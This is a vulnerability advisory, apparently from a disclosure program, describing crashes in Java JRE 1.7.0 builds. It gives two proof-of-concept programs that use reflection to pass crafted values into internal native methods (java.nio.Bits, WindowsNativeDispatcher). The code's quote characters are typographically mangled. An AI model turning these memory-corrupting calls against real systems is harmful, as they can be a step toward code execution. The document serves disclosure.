Java Crash Mishandling Execute Arbitrary (Native, Non-Java) Code Vulnerability

Summary

Java Crash Mishandling Execute suffers from arbitrary (native, non-Java) code vulnerability.

Credit:

Details

Vulnerable Systems:
 * Java JRE version 1.7.0_17
 * Java JRE version 1.7.0_09
 * Java JRE version 1.7.0_03

The following to exploits will cause Java to crash, the crash occurs due to mishandling of the data being passed to native functions. The crash can be controlled and used to modify arbitrary content in the memory which can then be used to cause Java to execute arbitrary (native, non-java) code.

Exploit 1:
import java.lang.reflect.*;

class exploit{

public static void main(String[] args) throws Exception{
//Thread.sleep(15*1000);
System.out.println(‘n[JFUZZER] Invoking tests for exploit’);
Class packageClass = Class.forName(‘java.nio.Bits’);
Constructor[] c = packageClass.getDeclaredConstructors();
Constructor ctor = c[0];
ctor.setAccessible(true);
Object target = ctor.newInstance();
System.out.println(‘[JFUZZER] Fuzzing methods…’);

try {
Class[] arguments = new Class[4];
arguments[0] = Object.class;
arguments[1] = long.class;
arguments[2] = long.class;
arguments[3] = long.class;

Method m = packageClass.getDeclaredMethod(‘copyFromIntArray’, arguments);
m.setAccessible(true);

byte[] data = {(byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab};

try {
Object[] params = {(Object)data, (long)0x00000000, (long)0x00400000, (long)0x0000000c};
m.invoke(target, params);
}
catch (Exception e) {
}

}
catch (Exception e) {
}

System.out.println(‘[JFUZZER] Fuzzing finished!’);
}
}

Exploit 2:
import java.lang.reflect.*;

class exploit{

public static void main(String[] args) throws Exception{
// Thread.sleep(15*1000);
System.out.println(‘n[JFUZZER] Invoking tests for sun_nio_fs_WindowsNativeDispatcher_InitializeSecurityDescriptor_param0_e3e0b8e7ab4663b5a007822e83cd9653’);
Class packageClass = Class.forName(‘sun.nio.fs.WindowsNativeDispatcher’);
Constructor[] c = packageClass.getDeclaredConstructors();
Constructor ctor = c[0];
ctor.setAccessible(true);
Object target = ctor.newInstance();
System.out.println(‘[JFUZZER] Fuzzing methods…’);
Long param1 = (long)0xdeadbeef;

try {
Class[] arguments = new Class[1];
arguments[0] = long.class;

Method m = packageClass.getDeclaredMethod(‘InitializeSecurityDescriptor’, arguments);
m.setAccessible(true);

try {
Object[] params = {param1};
m.invoke(target, params);
}
catch (Exception e) {
}

}
catch (Exception e) {
}

System.out.println(‘[JFUZZER] Fuzzing finished!’);
}
}

Acknowledgement:
The vulnerabilities have been identified by FuzzMyApp and disclosed to the vendor through the Beyond Security’s
SecuriTeam Secure Disclosure program.

Vendor Status:
Oracle has assessed these reported issues as not vulnerabilities as the described scenarios required the Security Manager to be turned off.

Categories: News